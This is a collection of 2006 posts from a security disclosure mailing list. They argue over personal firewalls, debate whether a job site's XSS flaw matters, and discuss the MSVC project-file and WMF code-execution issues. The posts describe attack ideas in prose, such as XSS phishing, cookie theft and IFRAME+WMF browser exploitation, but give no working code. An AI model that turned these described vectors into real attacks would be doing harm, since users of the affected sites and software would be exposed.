Nancy, I was not trying to make the point that ZA is some buggy unusable crap. Just that even properly configured we have encountered instances where it misbehaves, behaves inconsistently, and slows down web browsing with IE (not so much with opera or firefox apparently as I tried that out last night under a few setups). That said, configuring it correctly is key to its operation, if you misclicked at some point and accidently set a rule not to allow certain traffic or a certain application access to the network then you may experience the problems you describe. Please make sure you review all the rules and specific application settings to make sure your problems aren't configuration-related. -sb On 1/20/06, Nancy Kramer [EMAIL PROTECTED] wrote: I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Reading over this again let me clarify why I'm curious about this: 1) Yes I'm aware someone could redirect someone to a form claiming to be by MBT to harvest information 2) I just don't see the relevence to this list (if we reported every XSS in every site, we could fill this list with 100s of message per day) Know what I mean? -sb On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote: Well I'm not going to talk about how XSS is useless because we all know it can be quite a serious problem. I think, and I don't know the guy so I can't be sure, the original dissenter to this post was pointing out that: What would you phish from a site that doesn't have any forms anyways? What would stealing a session cookie get you if the only dynamic content is a search function? I'm not saying XSS isn't important, I'm just wondering why this case is? -sb On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote: Hey guy, do you know something about XSS 1) Phishing? 2) encoded URL, UTF8...? 3) cookie steal? ... it'll not be difficult to reproduce a website and have an url difficult to understand for a basic user... sure it's harder to spoof the url in the browser... // Native.Code a écrit : What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! - About FD: Speech is silver, but silence is gold /JA /https://www.securinfos.info/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
On 1/20/06, MuNNa [EMAIL PROTECTED] wrote: Hii -Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulenrabilities, its just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offeres no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything... I have clearly mentioned in the disclosure that this Xss is not harmful for server side but you can target a lot of people, using this website. If you have completly read my disclosure mail, i have mentioned in the end that a lot of people seeking job can be targeted. I can say this because i know the value of this organisation from point of placements. Morever this organisation provides security solution to other companies. From the point of comapny's security everything is fine but from the point of its social image.. Okay. -Which would be meaningful if: A) this site were used by millions of people B) there was something worth compromising the site for (like access to webmail, personal information, etc...) I think what I'm missing here is why this particular XSS is useful in any way shape or form?Am I missing something significant about this site? Do people trust it for something? As explained before , it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even i do very much. Okay see that's why I asked since this site is used by millions of people that actually answers my question. Thank you. -Isn't that what you are doing? I just posted a disclosure which i felt could be used by some bad guy to target innocent people.If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. Atleast i dont spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures. Yeah I actually felt bad after I wrote that line, I jsut didn't understand how his repsonse contributed to spam and yours didn't, know what I mean? Hope i answered all your answers. Lets cut down the argument here. You did, and thouroughly! I thank you! Regards; Santosh J You da man, Stan On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, MuNNa [EMAIL PROTECTED] wrote: Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possible Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulenrabilities, its just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offeres no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything... but also execution of malicious javascripts is possible.Your Lame reply Which would be meaningful if: A) this site were used by millions of people B) there was something worth compromising the site for (like access to webmail, personal information, etc...) I think what I'm missing here is why this particular XSS is useful in any way shape or form?Am I missing something significant about this site? Do people trust it for something? makes me think that you are one of the following: 1.An employee of MBT criticising me in the interest of the company 'or' 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future. Isn't that what you are doing? -sb Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
On 1/20/06, Morning Wood [EMAIL PROTECTED] wrote: in all honesty, XSS is a serious vector of attack. however, non-persistant XSS is a much less serious problem than is persistant XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistant nature of the flaw at one dedicated site. Unless that site is trusted by hundreds of thousands or millions of people, then something minor can be made to be much more serious. For instance, in this case someone could create a form for phishing purposes that looks like a job application and mail it to millions of people who think that its from MBT. Issues comes into play via persistant XSS, which is script that may be embedded in a web application, such as a guestbook, or comment section, where people would travel to on their own without the need of a direct link and then rendered upon visitation in the users browser. Further, in todays world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gained and is often of minor importance and information. What is bad is leveraging XSS as a vector for browser exploitation ( can we say IFRAME+WMF ), so you have a way, via XSS to COMPROMISE end users systems. While the OP does have a valid initial point and theory, 1. it is not persistant in nature 2. it is one site, and not a script used on many sites Yes thats what I was thinking, but apparently a lot of people use it, at least thats the gist I got. 3. it does require SE at some level to be effective 4. it should not have been posted to FD ( see points 1,2,3 ) This was my concern in previous replies. Why should XSS on one site be posted here, but as the list maintainer stated previously XSS in big sites like Google or Yahoo is pertinent to this list due to the large number of people they can affect. Assuming the author is correct about it possibly affecting millions of people then its relevence to this list is clearly satisfied. -sb my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: PC Firewall Choices
On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stoppped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticably, far more than average Norton System Works install causes. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? Try using google you'll found thousands of ZA problems, not all imagined. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things are much smoother and your heart rates go back down. I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. Just because someone doesn't take notes every time some piece of shit software doesn't work as advertised and uninstall it, doesn't make what they say any less true. Why would I install something just to prove it causes problems to satisfy the ego of someone who thinks because something works for them it must be perfect for everyone. It would be fruitless. If you can't find anyone reporting real problems with ZA then maybe you should browse your way over to www.google.com and do a search. cheers, DaveK [*] which I consider to be the gold standard for lousy, bloated, buggy, faulty software. -- Can't think of a witty .sigline today I have a sigline for you: ZA is in my mouth. Stop sucking. Why isn't it friday yet, -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: PC Firewall Choices
As cruel as that last message was I'm sick of the ZA pros here saying its perfect, its not, far from it. But I forgot to mention it beats Symantec's firewall hands down. Symantec Personal Firewall I've found from many different versions the same horrible inconsistencies in my experience installing it for a family member. For example: 1) In the 2004 iteration of NPF it would simply stop working at times. Basically it would just completely stop working and would prevent the lauch of even trusted applications. The only solution was to reset and pray it didn't happen again soon. 2) Even though Opera was fully conifgured in the rules (tried manually and automatic scan option), it would only launch half the time. NPF would block it from launching despite its own rules. It did this selectively with different applications. Sometimes it was just Opera, other times IE or Firefox would not open either. Killing the firewall service would make this go away. The above alone was enough to drive you nuts. NPF acted the above way after several reinstalls and even the formatting of the drive and reinstallation of Windows had no affect on its buggy ways. 2005 edition was no better. The 1st problem mentioned above didn't seem to happen with 2005, but the second problem continued unabated. It's like NPF would just decide on its own it didn't like a particular app or rule. It is relatively easy to configure, though finding exactly what you're looking for in the settings can be a pain at times. Best Regards, sb On 1/19/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stoppped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticably, far more than average Norton System Works install causes. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? Try using google you'll found thousands of ZA problems, not all imagined. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things are much smoother and your heart rates go back down. I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. Just because someone doesn't take notes every time some piece of shit software doesn't work as advertised and uninstall it, doesn't make what they say any less true. Why would I install something just to prove it causes problems to satisfy the ego of someone who thinks because something works for them it must be perfect for everyone. It would be fruitless
Re: [Full-disclosure] Security Bug in MSVC
On 1/19/06, redsand [EMAIL PROTECTED] wrote: i think the author of this advisory is desperate for advisories or attention. Well maybe the guy was just misled because Microsoft led him to believe it was something exciting? Either way it seems like anyone could open a project file in notepad and insert/modify anything they want in there. I mean its not like we've ever been able to trust projects or Makefiles/configures anyways. either way he needs to open a disassembler and work on something else. -sb Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example ) What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC Firewall Choices
My personal favorite was the older versions of Tiny Personal Firewall, though they did have the major flaw of popping up stuff when the computer was locked thus I stopped using it. They fixed it, but the revamped interface they put out a couple years ago wasn't to my liking. What do you think of the current Tiny compared to ZA? -sb On 1/17/06, Steven [EMAIL PROTECTED] wrote: I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines. I am trying to determine what product to go with and wanted to solicit some opinions from this mailing list. The four that I really come across and have used in some cases are ZoneAlarm, Sygate, Norton, Kerio, and Tiny. My understanding is that Norton has actually acquired Sygate and that the Sygate Personal Firewall probably wouldn't be the best choice of these now. With that in mind I am looking for a product that easy to setup, easy to use, works well, and does not take up too much in terms of system resources or harddrive space ( I also don't want it to add 20 minutes to the boot process either). I am not looking for e-mail protection, anitivrus, or any other non-firewall type services to be included. I do however want it to be able to manage applications and their internet usage. (i.e. if they install something new that tries to access the web (trojans included) they will get a popup telling them something is doing this). Any suggestions and opinions on the above products and any others that I might not have mentioned are welcomed. Also -- on top of this if someone knows of software/hardware that can scan these machines and verify whether or not both the SP2 FW and/or the 3rd part FW -- and perhaps prevent them network access if they are not running -- please let me know. [I am not sure what security products have these capabilities] Thanks Steven ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
On 1/19/06, Greg [EMAIL PROTECTED] wrote: I don't think anymore needs be said. Your mistakes, above, are enough to condemn you by your own word so for the sake of not making this any worse, we'll leave it here. What a convenient cop-out. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
On 1/17/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I think ms wont fixe any bug in vstudio, I have told them if they will fix the vs2005 issue published recently and they said me exactly what is on your support page: Only open project files that come from trusted sources. Yeah but hasn't it always been the case that you can execute pretty much anything from a msvs project file anyways? or Only open WMF files that come from trusted sources. would have been less effort than releasing a patch then lol :D -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Steve Gibson smokes crack?
Yes he did. :) -sb On 1/13/06, Todd Towles [EMAIL PROTECTED] wrote: Stan wrote: Yeah cause threads like this really open peoples eyes... I do agree with that...and I think the people know what they are seeing. Bkfsec stated the situation very well IMHO. cum hoc ergo propter hoc -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Steve Gibson smokes crack?
Ordinarily I'd argue, but its hard to when we find out Microsoft knew about the bug for a long time and made a concious decision not to patch it even though they knew it could lead to a system compromise. People commented on how Microsoft put out a patch quicker than they usually would but this is NOT THE CASE. According to Microsoft itself, they knew about the bug months before it was reported in December. Don't give credit where its not earned... -sb On 1/13/06, Morning Wood [EMAIL PROTECTED] wrote: http://aolradio.podcast.aol.com/sn/SN-022.mp3 claiming SetAbortProc() was a purpose placed backdoor... *puff*puff* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Steve Gibson smokes crack?
On 1/13/06, Todd Towles [EMAIL PROTECTED] wrote: Stan wrote: Ordinarily I'd argue, but its hard to when we find out Microsoft knew about the bug for a long time and made a concious decision not to patch it even though they knew it could lead to a system compromise. Concious decision? So you are in the Microsoft meetings? Do tell...didn't think so. They may have known about it, but many huge Do you often ask and answer your own questions? companies have security problems in their software..some are so embedded in the system or related to how the program work..that they will do anything to protect it. Why talk about hypotheticals when the thread is about the real thing? Why didn't this get thrown up with the Cisco/Lynn outcry? Oh...because Yeah cause Cisco has lots to do with SetAbortProc... hitting on Microsoft gets you more attention perhaps... Yeah cause threads like this really open peoples eyes... Don't get thrown off your high horse now, sb -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Steve Gibson smokes crack?
On 1/13/06, Todd Towles [EMAIL PROTECTED] wrote: Stan wrote: Ordinarily I'd argue, but its hard to when we find out Microsoft knew about the bug for a long time and made a concious decision not to patch it even though they knew it could lead to a system compromise. Also, Microsoft must have made the concious decision to have it not work by default on any pre-Windows 2000 machine? What kind of old secret government backdoor is that...when it doesn't even work. Here's a quote from me: they knew about the bug months before it was reported in December. Where does it mention some government consiracy dating back to the late 90's? Oh wait it doesn't... Todd chill out, you'll end up in cardiac ward if you're getting this worked over the facts. I could have said you planted the bug :-) -sb -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Steve Gibson smokes crack?
I wasn't agreeing its a conspiracy I was just saying they knew about this being serious for a while and did nothing about until it went public for whatever reason. -sb On 1/13/06, bkfsec [EMAIL PROTECTED] wrote: Stan Bubrouski wrote: Ordinarily I'd argue, but its hard to when we find out Microsoft knew about the bug for a long time and made a concious decision not to patch it even though they knew it could lead to a system compromise. People commented on how Microsoft put out a patch quicker than they usually would but this is NOT THE CASE. According to Microsoft itself, they knew about the bug months before it was reported in December. Don't give credit where its not earned... I'm going to try to walk the line here. I loath defending Microsoft, and I'm not defending them for their historical conduct, but I still can't see conspiracy theories being accurate yet. A few incidents (NSA backdoor) aside, Microsoft's history with security has been one of ineptness, not maliciousness per-se. This is their history going back to before they purchased IE, and something that became really evident when they first began rebuilding Mosaic. The WMF bug is in line with their development methodology up until (and in some ways including) recently. Microsoft's development mantra was, for a long time, ease of use at the expense of everything else. When NT came out and Microsoft moved from producing OS' that were not network ready out of the box and toy-like GUI infrastructures, the impacts of that strategy were transposed onto administrators and users (now more vulnerable than ever) alike. Ease of use became Ease of administration, and that became Ease of development. Netscape and Sun was threatening Microsoft's monopolistic paradigm with a new platform for application development that was easily cross-platform and as a result, IE had to become an even more robust method of distributing application and administration capabilities. We now see the fallout of that decision. The web browser was never meant to be an application subsystem - it was meant to interpret text documents into more visual documents organized in a linked fashion. It was never meant to run code on systems, but that's what it's become. The act of making that easier attracted every simpleton web developer who couldn't hack it anywhere else. Administrators saw ActiveX as a way to remotely administrate PCs they couldn't get to in any other way. These were mistakes... big mistakes from a security standpoint. But security was second to attracting new fresh bodies who could fill the seats and drone on endlessly about how awesome Microsoft was. And this pattern is what I see here -- ineptness in the interests of feature-creep. It's one thing to say that they sat on the knowledge that this was exploitable. It's another thing entirely to claim that they knowingly made it for the point of exploiting PCs if ActiveX was disabled. Given their history and the hallmarks of this flaw, I have a hard time making that leap. -bkfsec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Worm?
From your extremely detailed query I'd have to say the NSA. That of course is based on nothing. -sb On 1/13/06, Byrne, David [EMAIL PROTECTED] wrote: Our IPS vendor is reporting a number of customers affected by large volumes of traffic generated by a worm. Anyone have details? Thanks, David Byrne Corporate IT Security EchoStar Satellite L.L.C. 720-514-5675 [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Steve Gibson smokes crack?
Back to the original subject: [Full-disclosure] Steve Gibson smokes crack? Does anyone know if Steve Gibson does indeed smoke crack? If Marion Barry does, why can't he? These questions need answers! Or not, happy friday, drink up. -sb On 1/13/06, eric williams [EMAIL PROTECTED] wrote: On 13 Jan 2006 14:31:06 -0800, Randal L. Schwartz merlyn@stonehenge.com wrote: Morning == Morning Wood [EMAIL PROTECTED] writes: Morning http://aolradio.podcast.aol.com/sn/SN-022.mp3 Morning claiming SetAbortProc() was a purpose placed backdoor... I've heard that WINE suffers from the same exploit. How could it be a microsoft conspiracy if WINE (implemented from API docs) does the same thing? Randal, Thanks. That's is precisely the point I have been trying to make, however, the question is I gather flowing from the Gibson commentary, how or what exactly causes WINE to execute the code pointed at by the SetAbortProc record? Is it the incorrect record length is it some other munged input, is it by design which has also been alluded to, and seems to be your reference here. IOW, does any know the circumstances, in all cases, where the bug is triggered or is there only speculation based upon exploit code working against a given vulnerable implementation of the API? I know I am speculating, but is there or has there been a canonical analysis done by anyone? -e -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 merlyn@stonehenge.com URL:http://www.stonehenge.com/merlyn/ Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Determine My System Vulnerabilities
This is not the right list for this kind of question. How you managed to find this list but not the answers you are looking from google is astounding (no offense intended, this is a list to discuss the full disclosure of vulnerabilities). -sb On 1/10/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I have three servers running Linux Red Hat OS. I would lke to find a source for information regarding How Too when it comes to determining what level of kernel, SSH, PHP, ect my servers are running. I do know how to check some of these things but am looking for someone who is very knowledgeble and is willing to answer questions about this OS. Gene Smith Federal Reserve Bank of Minneapolis IT/ Telecom 612 204 6355 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PoC for the 2 new WMF vulnerabilities (DoS)
I read that and couldn't stop laughing. More from the I don't need to get it to explain it doctrine. It gets a gold star for effort, I wonder if he pulled out a thesaurus. -sb On 1/9/06, Danny [EMAIL PROTECTED] wrote: removed inane banter Is this what you are referring to: http://blogs.technet.com/msrc/archive/2006/01/09/417198.aspx ...D more crap snipped ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] infosecbofh
Oh where to begin... On 1/5/06, Joe Average [EMAIL PROTECTED] wrote: I guess he got bored of turning netdev into public enemy number one, to You are n3td3v, and talking in the third person under an assumed identity just adds to your own turmoil. divert attention away from the real guy who is messing up the list, none Yep infosecbofh, joe average, n3td3v, etc... are a nuisance, but in infosecbofh's defense he seems to be using only one email account to torture his victims. other than the guy who has never released any security vulnerabilities... I present to you...mr infosecbofh...round of applause! You keep coming back to this but all you ever find is XSS in sites, not even in products or such. I'm not putting down what you do, but you act like its so important and that it makes you more important even though it doesn't. Also, its hard to be sympathetic for you getting picked on when you *clearly* try to instigate situations at every turn, and when n3td3v isn't mentioned in a thread you bring him up, and he's you so what can you expect? Please stop responding to this crap, its no secret you want it to continue so your name gets more hits on google, but the rest of us could care less about you or problems with everyone who ever contradicts you. Stay in school and shut up. PLEASE. Best Regards, sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] infosecbofh
On 1/5/06, Joe Average [EMAIL PROTECTED] wrote: Why are you mentioning n3td3v? This thread is about infosecbofh, please keep First of all: Joe Average to Frank, full-disclosure 11:28 am (4 hours ago) I guess he got bored of turning netdev into public enemy number one, to divert attention away from the real guy who is messing up the list, none other than the guy who has never released any security vulnerabilities... I present to you...mr infosecbofh...round of applause! You brought up netdev. You keep bringing him up, its not the other way around. You are netdev and thats whats so fucking annoying. You pretend to be someone else to defend yourself. WE ALL GET IT. on topic. I don't believe the two XSSing vulnerabilities on Google Groups is all netdev is responsible for. Look closer into whats going on. Theres a world of conspriacy out there to be had. Lets not argue amoung ourselfs. No there isn't a consiracy against you, there is a public outcry for you to shut up and stop making up false conspiracies about yourself and your other alias and stop wasting everyone's time. The Sober.z variant will be attacking tomorrow and speculation that it'll have a WMF exploit payload is already sweeping the underground. I think we Why? Are you suddenly going to claim you're also Nick Fitzgerald, or that you have a clue because you read daily RSS feeds from Yahoo? should be concentrating on that kind of thing, than arguing on really low priorty topics like who is more of a disruption than who on a mailing list. You pretty much always instigate and drive off topic any thread that is serious these days, why should you recieve any courtesy? I mean you brought up netdev in this thread, I called you on it and now you claim I brought netdev up. You're a liar and a kid who still needs to grow up before he tells his classmates to do the same. Take care now. Stay in school. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS Patch Release for WMF Issue
